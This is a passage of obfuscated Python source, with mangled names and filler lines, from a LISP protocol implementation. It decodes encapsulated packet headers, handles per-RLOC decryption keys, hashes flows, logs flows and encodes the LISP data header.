self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
if 3 - 3: ooOoO0o / i1IIi - OoOoOO00
if 73 - 73: OoooooooOO * O0 * ooOoO0o
if 7 - 7: II111iiii + i1IIi
if 95 - 95: i11iIiiIii + OoooooooOO / OOooOOo - iIii1I11I1II1 + iIii1I11I1II1
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( I1I1iIIiii1 )
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( I1I1iIIiii1 )
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( I1I1iIIiii1 )
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( I1I1iIIiii1 )
OO0Oo00OO0oo = OO0Oo00OO0oo [ 8 : : ]
if 32 - 32: Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . ooOoO0o - i1IIi
if 60 - 60: OoOoOO00 % OoOoOO00
if 2 - 2: Ii1I . O0 - oO0o + IiII
if 96 - 96: Ii1I + Ii1I
iii111 = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
o00O000oooOo = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if 28 - 28: iII111i
if 6 - 6: I1IiiI - iII111i
if 49 - 49: II111iiii
if 33 - 33: o0oOOo0O0Ooo - oO0o % I1ii11iIi11i * I11i . OoooooooOO % Ii1I
if ( self . lisp_header . decode ( OO0Oo00OO0oo ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
if 29 - 29: iII111i + II111iiii . i11iIiiIii . Ii1I - O0
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
if 47 - 47: oO0o . I1ii11iIi11i - iIii1I11I1II1 % II111iiii / OoOoOO00 % OoooooooOO
OO0Oo00OO0oo = OO0Oo00OO0oo [ 8 : : ]
i1oO00O = self . lisp_header . get_instance_id ( )
oO += 16
if 13 - 13: IiII . Oo0Ooo - I11i / oO0o - Oo0Ooo - I1IiiI
if ( i1oO00O == 0xffffff ) : i1oO00O = 0
if 84 - 84: II111iiii
if 57 - 57: O0 * iIii1I11I1II1 % O0 . OoooooooOO
if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo
if 16 - 16: OoO0O00 % I1Ii111 . i1IIi / I1ii11iIi11i - O0
ooiIi11i1I11Ii = False
oo0OO0oo = self . lisp_header . k_bits
if ( oo0OO0oo ) :
Oo0o = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( Oo0o == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
if 54 - 54: II111iiii % o0oOOo0O0Ooo - i1IIi . I1IiiI - II111iiii / iIii1I11I1II1
self . print_packet ( "Receive" , is_lisp_packet )
iIIIii111 = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( iIIIii111 , oo0OO0oo ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 21 - 21: iII111i % IiII % Oo0Ooo % O0
if 63 - 63: II111iiii * I1IiiI - OoooooooOO / I1IiiI
III11II111 = lisp_crypto_keys_by_rloc_decap [ Oo0o ] [ oo0OO0oo ]
if ( III11II111 == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
if 8 - 8: i11iIiiIii
self . print_packet ( "Receive" , is_lisp_packet )
iIIIii111 = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( iIIIii111 ,
red ( Oo0o , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 4 - 4: i11iIiiIii
if 28 - 28: OoO0O00
if 73 - 73: Oo0Ooo . ooOoO0o - Oo0Ooo % OOooOOo / i11iIiiIii / iIii1I11I1II1
if 15 - 15: ooOoO0o * iIii1I11I1II1 * oO0o
if 96 - 96: I1Ii111 * iIii1I11I1II1 / OoOoOO00 % OOooOOo * II111iiii
III11II111 . use_count += 1
OO0Oo00OO0oo , ooiIi11i1I11Ii = self . decrypt ( OO0Oo00OO0oo , oO , III11II111 ,
Oo0o )
if ( ooiIi11i1I11Ii == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 3 - 3: OOooOOo . Oo0Ooo / i11iIiiIii + OoO0O00
if 47 - 47: IiII . OOooOOo
if 96 - 96: I11i % II111iiii / ooOoO0o % OOooOOo / ooOoO0o % i11iIiiIii
if 57 - 57: I11i - I11i % II111iiii % Oo0Ooo . o0oOOo0O0Ooo % Oo0Ooo
if 91 - 91: I1IiiI - OoO0O00 - Oo0Ooo - Ii1I * iIii1I11I1II1
if 68 - 68: OoO0O00 % O0 * iIii1I11I1II1 / oO0o * o0oOOo0O0Ooo + OOooOOo
I1iI1Ii11 = struct . unpack ( "B" , OO0Oo00OO0oo [ 0 : 1 ] ) [ 0 ]
self . inner_version = I1iI1Ii11 >> 4
if ( iii111 and self . inner_version == 4 and I1iI1Ii11 >= 0x45 ) :
o0oOO00O000O0 = socket . ntohs ( struct . unpack ( "H" , OO0Oo00OO0oo [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , OO0Oo00OO0oo [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , OO0Oo00OO0oo [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( OO0Oo00OO0oo [ 12 : 16 ] )
self . inner_dest . unpack_address ( OO0Oo00OO0oo [ 16 : 20 ] )
i1i = socket . ntohs ( struct . unpack ( "H" , OO0Oo00OO0oo [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( i1i & 0x2000 or i1i != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , OO0Oo00OO0oo [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , OO0Oo00OO0oo [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 89 - 89: o0oOOo0O0Ooo - II111iiii - I1Ii111 - OOooOOo % OoOoOO00 % I1IiiI
elif ( iii111 and self . inner_version == 6 and I1iI1Ii11 >= 0x60 ) :
o0oOO00O000O0 = socket . ntohs ( struct . unpack ( "H" , OO0Oo00OO0oo [ 4 : 6 ] ) [ 0 ] ) + 40
II1i1iI = struct . unpack ( "H" , OO0Oo00OO0oo [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( II1i1iI ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , OO0Oo00OO0oo [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( OO0Oo00OO0oo [ 8 : 24 ] )
self . inner_dest . unpack_address ( OO0Oo00OO0oo [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , OO0Oo00OO0oo [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , OO0Oo00OO0oo [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 84 - 84: o0oOOo0O0Ooo * i1IIi % Oo0Ooo
elif ( o00O000oooOo ) :
o0oOO00O000O0 = len ( OO0Oo00OO0oo )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( OO0Oo00OO0oo [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( OO0Oo00OO0oo [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
if 41 - 41: oO0o . iII111i + OoooooooOO * Ii1I . o0oOOo0O0Ooo
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( I1iI1Ii11 ) ) )
if 11 - 11: O0
OO0Oo00OO0oo = lisp_format_packet ( OO0Oo00OO0oo [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( OO0Oo00OO0oo ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
if 96 - 96: iII111i + o0oOOo0O0Ooo
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = i1oO00O
self . inner_dest . instance_id = i1oO00O
if 10 - 10: i11iIiiIii . OoooooooOO . O0 % ooOoO0o / OoO0O00
if 36 - 36: I1IiiI % i1IIi + OoO0O00
if 59 - 59: i11iIiiIii - i11iIiiIii + I1IiiI
if 4 - 4: Oo0Ooo * O0 - oO0o % ooOoO0o + OoOoOO00
if 3 - 3: OoOoOO00
if ( lisp_nonce_echoing and is_lisp_packet ) :
oo000O0o = lisp_get_echo_nonce ( self . outer_source , None )
if ( oo000O0o == None ) :
o00oO = self . outer_source . print_address_no_iid ( )
oo000O0o = lisp_echo_nonce ( o00oO )
if 2 - 2: IiII
OOO0O0O = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
oo000O0o . receive_request ( lisp_ipc_socket , OOO0O0O )
elif ( oo000O0o . request_nonce_sent ) :
oo000O0o . receive_echo ( lisp_ipc_socket , OOO0O0O )
if 5 - 5: OoOoOO00 % II111iiii * II111iiii . I1IiiI
if 11 - 11: iII111i
if 20 - 20: Ii1I . I1Ii111 % Ii1I
if 5 - 5: OOooOOo + iII111i
if 23 - 23: I1Ii111 % iIii1I11I1II1 . I11i
if 95 - 95: Oo0Ooo + i11iIiiIii % OOooOOo - oO0o
if 11 - 11: I1ii11iIi11i / O0 + II111iiii
if ( ooiIi11i1I11Ii ) : self . packet += OO0Oo00OO0oo [ : o0oOO00O000O0 ]
if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1
if 17 - 17: OoO0O00 - Oo0Ooo * O0 / Ii1I
if 19 - 19: i1IIi - iIii1I11I1II1 . I11i
if 2 - 2: Ii1I
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i
if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 81 - 81: iIii1I11I1II1
if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
def strip_outer_headers ( self ) :
IiI1ii1Ii = 16
IiI1ii1Ii += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ IiI1ii1Ii : : ]
return ( self )
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
def hash_ports ( self ) :
OO0Oo00OO0oo = self . packet
I1iI1Ii11 = self . inner_version
iiIIII11iIii = 0
if ( I1iI1Ii11 == 4 ) :
O0000O = struct . unpack ( "B" , OO0Oo00OO0oo [ 9 : 10 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( O0000O )
if ( O0000O in [ 6 , 17 ] ) :
iiIIII11iIii = O0000O
iiIIII11iIii += struct . unpack ( "I" , OO0Oo00OO0oo [ 20 : 24 ] ) [ 0 ]
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
if 67 - 67: O0 + I1IiiI + oO0o - II111iiii
if 27 - 27: o0oOOo0O0Ooo / I1IiiI
if ( I1iI1Ii11 == 6 ) :
O0000O = struct . unpack ( "B" , OO0Oo00OO0oo [ 6 : 7 ] ) [ 0 ]
if ( O0000O in [ 6 , 17 ] ) :
iiIIII11iIii = O0000O
iiIIII11iIii += struct . unpack ( "I" , OO0Oo00OO0oo [ 40 : 44 ] ) [ 0 ]
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
if 91 - 91: I1IiiI - iII111i / OoO0O00 - OoO0O00 / Ii1I - IiII
if 14 - 14: OOooOOo / o0oOOo0O0Ooo + Ii1I / OoooooooOO - I11i
return ( iiIIII11iIii )
if 88 - 88: Ii1I / OoooooooOO % OoOoOO00 - i1IIi
if 49 - 49: o0oOOo0O0Ooo - iIii1I11I1II1
def hash_packet ( self ) :
iiIIII11iIii = self . inner_source . address ^ self . inner_dest . address
iiIIII11iIii += self . hash_ports ( )
if ( self . inner_version == 4 ) :
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
elif ( self . inner_version == 6 ) :
iiIIII11iIii = ( iiIIII11iIii >> 64 ) ^ ( iiIIII11iIii & 0xffffffffffffffff )
iiIIII11iIii = ( iiIIII11iIii >> 32 ) ^ ( iiIIII11iIii & 0xffffffff )
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
if 61 - 61: iII111i * ooOoO0o
self . udp_sport = 0xf000 | ( iiIIII11iIii & 0xfff )
if 1 - 1: I1Ii111 * OoOoOO00
if 100 - 100: I1ii11iIi11i / O0 / ooOoO0o + I1ii11iIi11i
def print_packet ( self , s_or_r , is_lisp_packet ) :
if ( is_lisp_packet == False ) :
iiI = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
# iII111i . o0oOOo0O0Ooo / Ii1I / OOooOOo * i1IIi
green ( iiI , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if 90 - 90: I1IiiI . II111iiii - i1IIi + oO0o
if 58 - 58: iII111i - OoooooooOO
if ( s_or_r . find ( "Receive" ) != - 1 ) :
o00o = "decap"
o00o += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
o00o = s_or_r
if ( o00o in [ "Send" , "Replicate" ] or o00o . find ( "Fragment" ) != - 1 ) :
o00o = "encap"
if 62 - 62: I11i . II111iiii * O0 + i1IIi * OoooooooOO + OoooooooOO
if 23 - 23: i1IIi
IIiii1I1I = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if 62 - 62: II111iiii - OoOoOO00 * Ii1I
if 53 - 53: oO0o + iII111i
if 61 - 61: oO0o % Oo0Ooo % Ii1I
if 21 - 21: i1IIi + II111iiii
if 24 - 24: i11iIiiIii + i1IIi * OoOoOO00 % iII111i
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
i11 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
if 39 - 39: OoOoOO00 + I1Ii111 % O0
i11 += bold ( "control-packet" , False ) + ": {} ..."
if 26 - 26: ooOoO0o + OoOoOO00
dprint ( i11 . format ( bold ( s_or_r , False ) , red ( IIiii1I1I , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
i11 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if 17 - 17: I1ii11iIi11i - iII111i % Oo0Ooo * O0 % O0 * OOooOOo
if 6 - 6: I1Ii111
if 46 - 46: II111iiii * I1Ii111
if 23 - 23: i1IIi - O0
if ( self . lisp_header . k_bits ) :
if ( o00o == "encap" ) : o00o = "encrypt/encap"
if ( o00o == "decap" ) : o00o = "decap/decrypt"
if 6 - 6: ooOoO0o % OoooooooOO * I1Ii111 - IiII
if 24 - 24: I11i / iIii1I11I1II1 . OoooooooOO % OoOoOO00 . Ii1I
iiI = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
if 73 - 73: I1Ii111
dprint ( i11 . format ( bold ( s_or_r , False ) , red ( IIiii1I1I , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( iiI , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( o00o ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 25 - 25: IiII
if 77 - 77: o0oOOo0O0Ooo . iIii1I11I1II1 . OoooooooOO . iIii1I11I1II1
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 87 - 87: II111iiii - OoooooooOO / i1IIi . Ii1I - Oo0Ooo . i11iIiiIii
if 47 - 47: Oo0Ooo % OoO0O00 - ooOoO0o - Oo0Ooo * oO0o
def get_raw_socket ( self ) :
i1oO00O = str ( self . lisp_header . get_instance_id ( ) )
if ( i1oO00O == "0" ) : return ( None )
if ( i1oO00O not in lisp_iid_to_interface ) : return ( None )
if 72 - 72: o0oOOo0O0Ooo % o0oOOo0O0Ooo + iII111i + I1ii11iIi11i / Oo0Ooo
i1i1111I = lisp_iid_to_interface [ i1oO00O ]
I1iiIi111I = i1i1111I . get_socket ( )
if ( I1iiIi111I == None ) :
Oo0OOOOOOO0oo = bold ( "SO_BINDTODEVICE" , False )
IIIiii = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( Oo0OOOOOOO0oo , "drop" if IIIiii else "forward" ) )
if 44 - 44: IiII . I11i % I1IiiI - i1IIi
if ( IIIiii ) : return ( None )
if 2 - 2: OoOoOO00 + OoOoOO00
if 47 - 47: OoO0O00 + I1Ii111 . I1Ii111 * O0 / Oo0Ooo + OOooOOo
i1oO00O = bold ( i1oO00O , False )
iiIi = bold ( i1i1111I . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( i1oO00O , iiIi ) )
return ( I1iiIi111I )
if 44 - 44: o0oOOo0O0Ooo + I1Ii111 + OoOoOO00 * Oo0Ooo
if 20 - 20: ooOoO0o . I11i . i11iIiiIii / o0oOOo0O0Ooo / OoO0O00 . Ii1I
def log_flow ( self , encap ) :
global lisp_flow_log
if 47 - 47: O0 / iIii1I11I1II1 - OoOoOO00 + Ii1I
IIi11III1i = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or IIi11III1i ) :
IIIiiII1iIi1ii1i = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = IIIiiII1iIi1ii1i ) . start ( )
if ( IIi11III1i ) : os . system ( "rm ./log-flows" )
return
if 49 - 49: OoOoOO00
if 99 - 99: O0 + IiII + ooOoO0o - ooOoO0o * I1ii11iIi11i / IiII
i1 = datetime . datetime . now ( )
lisp_flow_log . append ( [ i1 , encap , self . packet , self ] )
if 82 - 82: o0oOOo0O0Ooo - OOooOOo
if 84 - 84: iII111i % i1IIi % OoO0O00 % II111iiii
def print_flow ( self , ts , encap , packet ) :
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
o0oO0o0O0o0Oo = "{}: {}" . format ( ts , "encap" if encap else "decap" )
if 10 - 10: I11i + I1IiiI + OoooooooOO . OoOoOO00
o0O0o = red ( self . outer_source . print_address_no_iid ( ) , False )
iii1I1II1iIii = red ( self . outer_dest . print_address_no_iid ( ) , False )
ii = green ( self . inner_source . print_address ( ) , False )
oOo00O0o = green ( self . inner_dest . print_address ( ) , False )
if 18 - 18: ooOoO0o
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
o0oO0o0O0o0Oo += " {}:{} -> {}:{}, LISP control message type {}\n"
o0oO0o0O0o0Oo = o0oO0o0O0o0Oo . format ( o0O0o , self . udp_sport , iii1I1II1iIii , self . udp_dport ,
self . inner_version )
return ( o0oO0o0O0o0Oo )
if 37 - 37: Oo0Ooo % i11iIiiIii - I1IiiI * I1ii11iIi11i . ooOoO0o
if 62 - 62: OoooooooOO / ooOoO0o + I1ii11iIi11i . o0oOOo0O0Ooo - iII111i
if ( self . outer_dest . is_null ( ) == False ) :
o0oO0o0O0o0Oo += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
o0oO0o0O0o0Oo = o0oO0o0O0o0Oo . format ( o0O0o , self . udp_sport , iii1I1II1iIii , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if 29 - 29: oO0o
if 26 - 26: O0 % OOooOOo - IiII . OOooOOo
if 70 - 70: o0oOOo0O0Ooo + I11i / iII111i + ooOoO0o / I1IiiI
if 33 - 33: OoooooooOO . O0
if 59 - 59: iIii1I11I1II1
if ( self . lisp_header . k_bits != 0 ) :
i1OOoO0OO0oO = "\n"
if ( self . packet_error != "" ) :
i1OOoO0OO0oO = " ({})" . format ( self . packet_error ) + i1OOoO0OO0oO
if 4 - 4: OoooooooOO
o0oO0o0O0o0Oo += ", encrypted" + i1OOoO0OO0oO
return ( o0oO0o0O0o0Oo )
if 7 - 7: IiII
if 26 - 26: OOooOOo + Oo0Ooo
if 71 - 71: I1IiiI . ooOoO0o
if 43 - 43: I1ii11iIi11i * OOooOOo
if 1 - 1: OoO0O00 * ooOoO0o + IiII . oO0o / ooOoO0o
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
if 91 - 91: Ii1I + I11i - Oo0Ooo % OoOoOO00 . iII111i
if 51 - 51: OOooOOo / I11i
O0000O = packet [ 9 : 10 ] if self . inner_version == 4 else packet [ 6 : 7 ]
O0000O = struct . unpack ( "B" , O0000O ) [ 0 ]
if 51 - 51: ooOoO0o * oO0o - I1Ii111 + iII111i
o0oO0o0O0o0Oo += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
o0oO0o0O0o0Oo = o0oO0o0O0o0Oo . format ( ii , oOo00O0o , len ( packet ) , self . inner_tos ,
self . inner_ttl , O0000O )
if 46 - 46: o0oOOo0O0Ooo - i11iIiiIii % OoO0O00 / Ii1I - OoOoOO00
if 88 - 88: oO0o * I1IiiI / OoO0O00 - OOooOOo / i1IIi . I1Ii111
if 26 - 26: i11iIiiIii - ooOoO0o
if 45 - 45: ooOoO0o + II111iiii % iII111i
if ( O0000O in [ 6 , 17 ] ) :
o00OoOo0 = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( o00OoOo0 ) == 4 ) :
o00OoOo0 = socket . ntohl ( struct . unpack ( "I" , o00OoOo0 ) [ 0 ] )
o0oO0o0O0o0Oo += ", ports {} -> {}" . format ( o00OoOo0 >> 16 , o00OoOo0 & 0xffff )
if 22 - 22: iIii1I11I1II1 / ooOoO0o / I1IiiI - o0oOOo0O0Ooo
elif ( O0000O == 1 ) :
II = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
if ( len ( II ) == 2 ) :
II = socket . ntohs ( struct . unpack ( "H" , II ) [ 0 ] )
o0oO0o0O0o0Oo += ", icmp-seq {}" . format ( II )
if 95 - 95: iIii1I11I1II1
if 75 - 75: OOooOOo - OoO0O00
if ( self . packet_error != "" ) :
o0oO0o0O0o0Oo += " ({})" . format ( self . packet_error )
if 91 - 91: O0 . I1Ii111
o0oO0o0O0o0Oo += "\n"
return ( o0oO0o0O0o0Oo )
if 31 - 31: O0 - IiII * i11iIiiIii * i1IIi
if 78 - 78: ooOoO0o * OoOoOO00 . Ii1I . OoOoOO00 % iIii1I11I1II1
def is_trace ( self ) :
o00OoOo0 = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in o00OoOo0 )
if 67 - 67: Ii1I . Oo0Ooo
if 39 - 39: I11i * I1Ii111
if 63 - 63: ooOoO0o % I1IiiI . OOooOOo - ooOoO0o / Oo0Ooo % I1IiiI
if 39 - 39: o0oOOo0O0Ooo . i1IIi % oO0o / I11i % O0
if 100 - 100: I1Ii111 - OoOoOO00
if 78 - 78: OoooooooOO - OoOoOO00 . i11iIiiIii
if 36 - 36: oO0o * iII111i + IiII * iII111i . I1ii11iIi11i - iIii1I11I1II1
if 14 - 14: I11i * oO0o + i11iIiiIii
if 84 - 84: iII111i / II111iiii
if 86 - 86: I1IiiI
if 97 - 97: II111iiii
if 38 - 38: I1IiiI
if 42 - 42: o0oOOo0O0Ooo
if 8 - 8: i11iIiiIii / ooOoO0o
if 33 - 33: I1Ii111 * IiII - O0 + I1IiiI / IiII
if 19 - 19: i1IIi % II111iiii
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
if 85 - 85: IiII - o0oOOo0O0Ooo % OOooOOo - II111iiii
class lisp_data_header ( object ) :
def __init__ ( self ) :
self . first_long = 0
self . second_long = 0
self . k_bits = 0
if 56 - 56: Ii1I * i11iIiiIii
if 92 - 92: II111iiii - O0 . I1Ii111
def print_header ( self , e_or_d ) :
oOOOoOO = lisp_hex_string ( self . first_long & 0xffffff )
oOO0 = lisp_hex_string ( self . second_long ) . zfill ( 8 )
if 64 - 64: i1IIi
i11 = ( "{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + "iid/lsb: {}" )
if 71 - 71: IiII * o0oOOo0O0Ooo
return ( i11 . format ( bold ( e_or_d , False ) ,
"N" if ( self . first_long & LISP_N_BIT ) else "n" ,
"L" if ( self . first_long & LISP_L_BIT ) else "l" ,
"E" if ( self . first_long & LISP_E_BIT ) else "e" ,
"V" if ( self . first_long & LISP_V_BIT ) else "v" ,
"I" if ( self . first_long & LISP_I_BIT ) else "i" ,
"P" if ( self . first_long & LISP_P_BIT ) else "p" ,
"K" if ( self . k_bits in [ 2 , 3 ] ) else "k" ,
"K" if ( self . k_bits in [ 1 , 3 ] ) else "k" ,
oOOOoOO , oOO0 ) )
if 99 - 99: o0oOOo0O0Ooo
if 28 - 28: OoooooooOO % O0 - OOooOOo / o0oOOo0O0Ooo / I1IiiI
def encode ( self ) :
Iii1iIII1Iii = "II"
oOOOoOO = socket . htonl ( self . first_long )
oOO0 = socket . htonl ( self . second_long )
if 13 - 13: iIii1I11I1II1 - OOooOOo
i111ii1II11ii = struct . pack ( Iii1iIII1Iii , oOOOoOO , oOO0 )
return ( i111ii1II11ii )
if 21 - 21: I11i
if 79 - 79: OoO0O00 / OOooOOo - i1IIi + i1IIi - IiII + IiII
def decode ( self , packet ) :
Iii1iIII1Iii = "II"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( False )
if 18 - 18: Ii1I + OoOoOO00 . i1IIi / IiII / iII111i
oOOOoOO , oOO0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 97 - 97: OoO0O00 + iIii1I11I1II1
if 79 - 79: ooOoO0o + oO0o - II111iiii . Oo0Ooo
self . first_long = socket . ntohl ( oOOOoOO )
self . second_long = socket . ntohl ( oOO0 )
self . k_bits = ( self . first_long & LISP_K_BITS ) >> 24
return ( True )
if 26 - 26: IiII
if 52 - 52: O0 + ooOoO0o
def key_id ( self , key_id ) :
self . first_long &= ~ ( 0x3 << 24 )
self . first_long |= ( ( key_id & 0x3 ) << 24 )
self . k_bits = key_id
if 11 - 11: i1IIi / I1Ii111 * I1ii11iIi11i * I1Ii111 * ooOoO0o - i11iIiiIii
if 96 - 96: I1ii11iIi11i % I1ii11iIi11i
def nonce ( self , nonce ) :
self . first_long |= LISP_N_BIT
self . first_long |= nonce
if 1 - 1: I1IiiI . Ii1I
if 26 - 26: oO0o - ooOoO0o % Oo0Ooo - oO0o + IiII
def map_version ( self , version ) :
self . first_long |= LISP_V_BIT
self . first_long |= version
if 33 - 33: Ii1I + OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 % i1IIi * IiII
if 21 - 21: O0 * ooOoO0o % OoO0O00
def instance_id ( self , iid ) :
if ( iid == 0 ) : return
self . first_long |= LISP_I_BIT
self . second_long &= 0xff
self . second_long |= ( iid << 8 )
if 14 - 14: O0 / I1Ii111 / ooOoO0o + IiII - IiII
if 10 - 10: O0 - I1ii11iIi11i / I1Ii111 % OoOoOO00 / OoooooooOO / Ii1I
def get_instance_id ( self ) :
